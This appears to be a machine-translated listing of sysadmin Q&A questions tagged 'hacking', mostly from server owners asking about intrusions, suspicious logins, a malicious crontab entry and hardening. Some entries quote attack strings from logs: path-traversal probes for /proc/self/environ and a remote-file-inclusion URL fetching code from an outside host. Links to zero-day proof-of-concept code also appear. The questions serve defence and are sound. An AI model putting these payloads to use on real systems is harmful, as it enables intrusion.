Questions tagged «hacking»

我现在有点吓坏了。我正在SSH进入最近已调试的远程服务器。我正在以此为根。我已经安装了fail2ban，并且日志中有大量被禁止的IP。 上次登录时，我发现我的终端确实很慢，然后我的互联网连接断开了。当我大约5分钟后买回它时，我重新登录服务器并做了一个“ who”操作，并意识到有两个root用户登录。我本以为，如果我的连接终止了，从上次会话开始的过程将是在服务器上停止了？ 当我第一次断开连接时，连接以“写入失败：管道破裂”结束。我用另一个根杀死了bash会话。我对SSH安全性了解不多，但是可以劫持会话吗？有没有办法检查这个？我需要继续通过ssh登录，应采取哪些预防措施？如果我不知何故要通过代理服务器到达我的服务器（就像中间攻击中的一个人），他们会劫持我的ssh会话吗？

14 linux  ssh  security  unix  hacking 

根据Internet Storm Center的说法，那里似乎存在SSH零时差漏洞。 这里有一些概念证明代码和一些参考资料： http://secer.org/hacktools/0day-openssh-remote-exploit.html http://isc.sans.org/diary.html?storyid=6742 这似乎是一个严重的问题，因此每个Linux / Unix系统管理员都应该小心。 如果未及时解决此问题，我们如何保护自己？还是您一般如何处理零时差攻击？ *我将在回复中发表我的建议。

13 linux  security  ssh  hacking  exploit 

如果为您提供了运行Windows 2000或更高版本的计算机，并且没有密码，那么您将使用哪种方法以管理员权限获得访问权限，从而可以使用系统？

13 windows  password  hacking 

有人可以告诉我这是什么意思吗？我尝试了一个命令，例如lastb查看最近的用户登录，并且看到一些来自中国的奇怪登录信息（服务器是EU，我在EU）。我想知道这些是登录尝试还是成功登录？ 这些似乎很旧，通常我只将端口22锁定到我的IP，我想我将端口打开了一段时间，最后一次日志是在7月。 root ssh:notty 222.92.89.xx Sat Jul 9 12:26 - 12:26 (00:00) root ssh:notty 222.92.89.xx Sat Jul 9 12:04 - 12:04 (00:00) oracle ssh:notty 222.92.89.xx Sat Jul 9 11:43 - 11:43 (00:00) gary ssh:notty 222.92.89.xx Sat Jul 9 11:22 - 11:22 (00:00) root ssh:notty 222.92.89.xx Sat Jul 9 11:01 - …

13 ssh  log-files  login  hacking 

问题： 如果某个虚拟机已损坏（被黑客入侵），那么我会对在同一物理计算机上运行的其他虚拟机承担什么风险？ 在同一物理主机上运行的虚拟机之间存在什么样的安全问题？ 有（您可以列出）这些（潜在）弱点和/或问题吗？ 警告： 我知道存在许多虚拟化类型/解决方案，并且可能存在不同的弱点。但是，我主要是在寻找有关虚拟化技术的一般安全问题，而不是特定的供应商错误。 请提供真实的事实，（认真的）研究，有经验的问题或技术说明。请明确点。不要（仅）发表您的意见。 例子： 两年前，我听说可能存在与MMU有关的安全性问题（我认为访问其他计算机的主内存），但是我不知道这是今天的实际威胁，还是只是理论研究学科。 编辑：我还发现，即使GnuPG在另一台 VM上运行，这种“刷新+重新加载”攻击也能够通过利用L3 CPU缓存来检索同一台物理计算机上的GnuPG秘密密钥。此后，已对GnuPG进行了修补。

12 security  virtualization  virtual-machines  hacking  hypervisor 

我在ubuntu 10.10机器上的sshd二进制文件包含以下ascii图稿： ng: %.100sToo many lines in environment file %sUser %.100s not allowed because %s exists YOU WANNA . SMOKE M A SPLIFF ? dM ROLL ME MMr %d TIMES 4MMML . MMMMM. xf . MMMMM .MM- Mh.. MMMMMM .MMMM .MMM. .MMMMML. MMMMMh )MMMh. MMMMMM MMMMMMM 3MMMMx. MMMMMMf xnMMMMMM '*MMMMM …

12 ubuntu  ssh  hacking 

浏览我的404日志时，我注意到以下两个URL，它们两个都发生一次： /library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 和 /library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 有问题的页面library.php需要一个type具有六个不同可接受值的id变量，然后是一个变量。因此，有效的网址可能是 library.php?type=Circle-K&id=Strange-Things-Are-Afoot 并且所有ID都必须mysql_real_escape_string先运行，然后才能用于查询数据库。 我是菜鸟，但在我看来，这两个链接都是针对Webroot的简单攻击？ 1）如何最好地防止404以外的其他事情？ 2）我应该永久禁止负责的IP吗？ 编辑：也只是注意到这一 /library.php=http://www.basfalt.no/scripts/danger.txt 编辑2：所有这3次攻击的违法IP都216.97.231.15追溯到位于洛杉矶外部的ISP，称为Lunar Pages。 编辑3：我决定在当地时间星期五早上致电ISP，并与可以与我打电话的人讨论这个问题。我将在24小时左右的时间内将结果发布在这里。 编辑4：我最终给他们的管理员发送了电子邮件，他们首先回答说“他们正在调查”，然后一天后回答“现在应该解决此问题”。遗憾的是，没有更多细节。

12 security  mysql  php  hacking 

按照目前的情况，这个问题并不适合我们的问答形式。我们希望答案得到事实，参考或专业知识的支持，但是这个问题可能会引起辩论，争论，民意调查或扩展讨论。如果您认为此问题可以解决并且可以重新提出，请访问帮助中心以获取指导。 8年前关闭。 已锁定。该问题及其答案被锁定，因为该问题是题外话，但具有历史意义。它目前不接受新的答案或互动。 破解别人拥有的真实系统是否合乎道德？不是为了牟利，而是为了测试您的安全知识并学习新知识。我只谈论hack，它不会对系统造成任何损害，只是证明存在一些安全漏洞。

12 security  hacking 

我正在运行小型（基于Windows）服务器。当我检查日志时，看到稳定的（未成功的）猜测密码的黑客尝试流程。我应该尝试将这些尝试报告给源IP地址的所有者，还是现在认为这些尝试是完全正常的，无论如何也没有人会为它们做任何事情？

12 security  hacking  abuse 

我以为这些是某种类型的机器人，但想知道他们想对我的服务器做什么。 问题中的日志在下面，并且IP地址已从原始更改。 12.34.56.78 - - [18/Oct/2012:16:48:20 +0100] "\x86L\xED\x0C\xB0\x01|\x80Z\xBF\x7F\xBE\xBE" 400 172 "-" "-" 12.34.56.78 - - [18/Oct/2012:16:50:28 +0100] "\x84K\x1D#Z\x99\xA0\xFA0\xDC\xC8_\xF3\xAB1\xE2\x86%4xZ\x04\xA3)\xBCN\x92r*\xAAN\x5CF\x94S\xE3\xAF\x96r]j\xAA\xC1Y_\xAE\xF0p\xE5\xBAQiz\x14\x9F\x92\x0C\xCC\x8Ed\x17N\x08\x05" 400 172 "-" "-" 12.34.56.78 - - [18/Oct/2012:16:58:32 +0100] "g\x82-\x9A\xB8\xF0\xFA\xF4\xAD8\xBA\x8FP\xAD\x0B0\xD3\xB2\xD2\x1D\xFF=\xAB\xDEC\xD5\xCB\x0B*Z^\x187\x9C\xB6\xA6V\xB8-D_\xFE" 400 172 "-" "-" 12.34.56.78 - - [18/Oct/2012:17:06:59 +0100] "\xA61[\xB5\x02*\xCA\xB6\xC6\xDB\x92#o.\xF4Kj'H\xFD>\x0E\x15\x0E\x90\xDF\xD0R>'\xB8A\xAF\xA3\x13\xB3c\xACI\xA0\xAA\xA7\x9C\xCE\xA3\x92\x85\xDA\xAD1\x08\x07\xFC\xBB\x0B\x95\xA8Z\xCA\xA1\xE0\x88\xAEP" 400 172 "-" "-" 12.34.56.78 - - [18/Oct/2012:17:13:53 +0100] "b\xC4\xA24Z\xA2\x95\xEFc\xAF\xF1\x93\xE8\x81\xFD\xB4\xDEo\x92\xC0v\x1Fe\xD8W\x85\xC7O\x9D\x8C\x89<" 400 172 …

12 nginx  logging  hacking 

我的公司在北美托管了一个Google Compute Engine服务器。我们有太多的中国IP地址向端口11发送请求，以至于我们花了钱进入该端口。我们的防火墙已经阻止了与中国的所有连接，因为它们无法访问我们的应用程序。 有没有一种方法可以完全忽略这些连接，或者以一种不会占用带宽的方式将其阻塞？

11 firewall  linux-networking  hacking  google-compute-engine  china 

最近（但这也是一个经常性的问题），我们看到了有关黑客和安全性的3个有趣的线索： 如何处理受到感染的服务器？。 查找被黑服务器被黑的方式 文件权限问题 最后一个与之没有直接关系，但是它强调了搞乱Web服务器管理是多么容易。 由于可以做的事情很多，因此在不良事件发生之前，我想就如何限制攻击的负面影响以及如何在可悲的情况下做出反应的良好做法向您提出建议。 这不仅是保护服务器和代码安全的问题，而且还涉及审计，日志记录和对策。 您是否有任何良好做法清单，还是希望依靠持续分析Web服务器的软件或专家（或根本不分析）？ 如果是，可以分享您的清单和想法/意见吗？ 更新 我收到了一些很好的有趣的反馈。 我希望有一个简单的列表，以便IT安全管理员可以方便地使用，也可以使用Web Factotum管理员。 即使每个人都给出了正确正确的答案，此刻，我还是更喜欢Robert，因为它是最简单，清晰和简洁的；而我更喜欢sysadmin1138，因为它是最完整，最精确的。 但是没有人考虑用户的观点和看法，我认为这是必须首先考虑的。 用户将在什么时候访问我的被黑网站时会想到什么，如果您拥有关于它们的敏感数据，则更重要。这不仅关系到在何处存储数据，还关系到如何使生气的用户平静下来。 数据，媒体，权威机构和竞争对手呢？

11 security  logging  hacking 

我有一台运行桌面ubuntu发行版的家庭服务器。我在crontab中找到了这个 * * * * * /home/username/ /.access.log/y2kupdate >/dev/null 2>&1 当在该目录中查找时（用户名/之后的空格是目录名称），我发现很多脚本显然在做他们不应该做的事情。 在擦除那台计算机并重新安装东西之前，我想找出导致此安全漏洞的原因以及完成的时间。因此，我不再打开同一孔。 我应该查看哪些日志文件？我知道计算机上正在运行的唯一服务器是sshd和lighttpd。 我应该怎么做才能检测出这种情况是否再次发生？

11 linux  ubuntu  security  hacking  forensic-analysis 

从昨天开始，我的一个网站上发生了奇怪的事情。 我在IIS上的wordpress网站的index.php从1 kb更改为80 KB。该目录中的map.xml和sitemap.xml也是新的。在wp-content / themes或wp-content / includes文件中也找到了一些其他文件。像b.php或e.asp。 在日志中，我可以找到一个条目，该条目显示了我认为的过程。POST /wordpress/wordpress/wp-content/plugins/easyrotator-for-wordpress/b.php-80或POST /wp-content/themes/koppers12/library/e.asp | 26 | 800a0408 | Invalid_character 80 这可能与以下事实有关：我的安全性设置可能不太严格，但是我无法弄清楚如何加强安全性，但是无法让wordpress本身，主题和插件的更新机制起作用。 当前，整个网站的权限（iusr）设置为读写。如果我将其更改为只读，则由于权限较少，整个更新机制将失败 有什么方法可以防止在网站上注入不需要的文件，但又可以更新wordpress，主题和插件？ 使用的注入方法可能是某些插件的利用，还是由于权限而使站点注入了不需要的文件？ （我已经阻止了引起这种情况的ip地址，但这并没有太大帮助，因为在其他ip地址/范围上已经可以看到这种注入方法。）

10 iis  permissions  wordpress  hacking 

我试图说服客户为需要登录的网站支付SSL费用。我想确保我正确理解了有人可以看到正在发送的密码的主要情况。 我的理解是，在此过程中的任何跃点都可以使用数据包分析器查看正在发送的内容。 这似乎要求任何黑客（或其恶意软件/僵尸网络）必须与数据包到达其目的地所经过的任何跃点位于同一子网中。那正确吗？ 假设此子网要求具有某种意义，我是否需要担心所有跃点还是仅担心第一个跃点？我显然可以担心第一个问题，因为它们是否在公共Wifi网络上，因为任何人都可以侦听。 我是否应该担心数据包将在此之外传播的子网中发生了什么？ 我对网络流量一无所知，但是我认为它正在流经主要运营商的数据中心，那里没有很多多汁的攻击媒介，但是如果我错了，请纠正我。 在使用数据包分析器进行监听的人员之外，还有其他需要担心的问题吗？ 我是网络和安全领域的新手，因此，如果我在任何一种情况下使用了错误的术语，请随时说明我的意思。

10 security  ssl  https  hacking  packet-sniffer